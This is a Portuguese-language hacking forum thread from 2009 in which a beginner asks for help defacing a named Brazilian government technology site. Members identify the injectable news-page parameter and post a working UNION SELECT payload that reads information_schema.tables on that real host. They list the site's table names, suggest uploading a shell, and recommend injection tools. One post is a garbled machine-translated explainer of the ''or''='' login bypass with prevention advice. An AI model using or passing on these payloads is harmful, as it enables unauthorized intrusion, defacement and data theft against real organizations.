antes de tudo um abraço o forum ta muito bom.. o problema é um seguinte sou iniciante em deface é to apredendo sql injection más não consigo achar a coluna desse site ele é vulneravel a sql injection é outras vulnerabilidades
(http://img63.imageshack.us/img63/2282/sitevulneravel.jpg) print do acunetix
estou querendo ownar esse site aqui http://www.ibict.br/ (http://www.ibict.br/)
ele é vulneravel a sql injection más não consigo achar as colunas é tabelas esta muito dificil.
Não sei.. Acho eu... Que ajudaria se você tivesse colocado qual o input aberto a sql inject...
(input aberto) o que seria isso é como descubro qual o input ??
acho que ainda não aprendi direito
Acho que você ainda não conhece o milw0rm né?
Pois bem, de uma olhada no site, lá tem muitos artigos de ótima qualidade.
Sql Injection in MsSql: http://www.milw0rm.com/papers/279
Sql Injection in MySql: http://www.milw0rm.com/papers/202
Quote from: pinguinacs on 23 de December , 2009, 04:31:12 PM
(input aberto) o que seria isso é como descubro qual o input ??
acho que ainda não aprendi direito
isso: http://www.ibict.br/noticia.php?id=676
acho que o MrRuffl3Z quis dizer:
ta vendo aquele: + SQL Injection (18)
clica no + para mostrar as url, man.
http://www.ibict.br/noticia.php?id=5
eu aprendi o que é input eu acho minha definição me corriga se eu estiver errado aonde coloca a injeção certo ??
a input pelo menos pra mim é aqui http://www.ibict.br/noticia.php?id=5 (aqui)
obs: é um site do governo sobre tecnologia
milw0rm/papers
sem +; IAUIEHAIEHUIAEHUIHAEUIHUI
[]'s 8) ( muito louco esses emoticons de natal. KK)
;D
pro povo que não ta sabendo ainda, o milw0rm ja se foi faz um tempo já.
agora é Exploit DB (http://www.exploit-db.com/)
8)
yes, exploit db e http://securityreason.com/exploit_alert/
existe algum exploit para invadir por Sql injection existe exploit para isso
obs:por favor eu sei que voces são bons não invada o site que to tentando invadir XD
SE SQL Injection fose um software, sistema operacional, sistema, etc
ai quem sabe não teria exploit para ele...
mas como SQL Injection é uma tecnica de injetar comandos sql em um input mal feito...
não existe exploit para tecnica... nem faz sentido :p
no maximo uma tool para 'ajudar' nisso.
invadir esse site? haam
eu nem tentaria, não to afim de chamar a atenção o/
A injeção SQL vulnerabilidade pode ocorrer quando um mal-escrito programa usa os dados fornecidos por usuários em um banco de dados consulta sem primeiro validar a entrada. Esta é mais freqüentemente encontrados dentro de páginas web com conteúdo dinâmico. Há alguns excelentes tutoriais e descritivo artigos sobre este assunto, bem como muitas vulnerabilidades lançamentos para diferentes aplicações de full-divulgação websites.
Um exemplo simples injeção de SQL é um formulário de login em HTML básico, que você forneça um nome de usuário e senha:
<form method="post" action="process_login.php">
<input type="text" name="username">
<input type="password" name="password">
</ form>
Dado este snippet do HTML, um pode deduzir que o mais fácil (e piores) caminho para o script "process_login.php" para trabalhar para ele seria para construir e executar uma consulta de dados que se parece com esta:
"SELECT id
FROM logins
ONDE username = '$ username'
e senha = '$ senha' ";
Nestas circunstâncias, se as variáveis "$ username" e "$ senha" são tomadas directamente a partir da entrada do usuário, o login script pode ser facilmente induzido a pensar que uma senha válida tenha sido fornecida por brincar com a sintaxe do SQL. Suponha a seguinte seqüência foram fornecidos como a senha:
'Ou''='
e demos "Bob", como nome do usuário. Uma vez que as variáveis são interpoladas, a consulta acima ficaria assim:
"SELECT id
FROM logins
ONDE username = 'bob'
e senha =''ou''='' ";
Esta consulta irá devolver uma linha, porque a cláusula final:
... =''ou''
será sempre avaliar a verdade (uma string vazia é sempre igual a uma string vazia).
Prevenir SQL Injection Attacks
Os métodos mais comuns para prevenir este tipo de injeção SQL vunerability são para verificar a entrada do usuário para a perigosa caracteres como um único aspas e usar declarações preparadas, o que dizer a base de dados exatamente o que esperar antes de qualquer utilizador, desde os dados são passados para ela.
obrigado Reeves ajudou bastante
más voce citou sobre um tool qual seria ??? aonde consigo um tool para sql injection ?? que tipo de tool é esse ?
obs: a um tempo a traz eu tinha um tool de sql injection que encontrava as tabelas é colunas más infelizmente eu não fiz backup é formatei meu pc é perdi essa ferramenta :-\
Quotepro povo que não ta sabendo ainda, o milw0rm ja se foi faz um tempo já.
agora é Exploit DB
mas ainda tem coisas que vão ajudar o nosso amigo a aprender sql injection.
caro
pinguinacsse tu procura um pouco mais, tu vai acha isso aqui fácil fácil:
SQL Inject Me 0.4.4 (https://addons.mozilla.org/pt-BR/firefox/addon/7597)
SQL Injection 1.3 (https://addons.mozilla.org/pt-BR/firefox/addon/6727)
Tamper Data 10.1.0 (https://addons.mozilla.org/pt-BR/firefox/addon/966)
Procure nos Complementos Firefox (https://addons.mozilla.org/pt-BR/firefox/)
Isso vai te ajuda um pouco.
Quotemas ainda tem coisas que vão ajudar o nosso amigo a aprender sql injection.
Lógico.
caro pinguinacs
a melhor tool desse mundo se chama "o seu cerebro"
isso é a essência da coisa toda, perca 1 semana, que seja
entenda bem o que está fazendo, estude SQL...
serio, não existe ferramenta melhor para usar que seu cerebro, pois ele é ilimitado
xD
não são apenas palavras bonitas, isso se aplica a todos que ficam até as 4 da manhã quebrando a cabeça com um problema...
digo por mim, vale muito a pena, com o conhecimento acumulado, você vai conseguindo coisas incriveis mesmo sem querer, vira um instinto.
estude kra, estude!
não existe melhor ferramenta nesse mundo que o proprio cerebro!
abraços e feliz natal!
hou hou houu..
oks valews más voce pode me dar umas dicas de palavras que podem estar no nome das colunas ou tabelas ??
Porra, pelo visto você não leu absolutamente nada do que eu postei né?
Não precisa chutar nenhuma tabela, a versão do mysql é 5. (5.0.32-Debian_7etch5-log), você pode pegar as tabelas pelo information_schema.tables!
Quotehttp://www.ibict.br/noticia.php?id=-676%20union%20all%20select%201,table_name%20from%20information_schema.tables%20limit%2021,21--
vichiii nem sei ver a versão affs vou estudar mais esquece
sim kra estude...
o kra te passo a versão e ainda passo a query para ver as tabelas no banco...
'http://www.ibict.br/noticia.php?id=-676%20union%20all%20select%201,table_name%20from%20information_schema.tables%20limit%2021,21--'
mais bonznho que isso impossivel, basta tu mandar o que quiser.
as tabelas do banco são:
arquiv_secoes, arquivos, atalho, chamadas, concursos, log_adm, noticia, portais, pro_links,pro_outros, prossiga1, prossiga2, revistas_seer, revistas_seer_teste.........
ok ok, tem mta tabela!
mas se vc não sabe sql e banco, nada feito né ;)
uhauhaUHAHUauhaahuahau
xD
da até para fazer upload de shell usando esse input, mysql de perna aberta
antes de tudo desculpe a demora da respota motivo FESTAS é natal XD
upload de shel como assim tipo PHP injection NOSSA CURTI em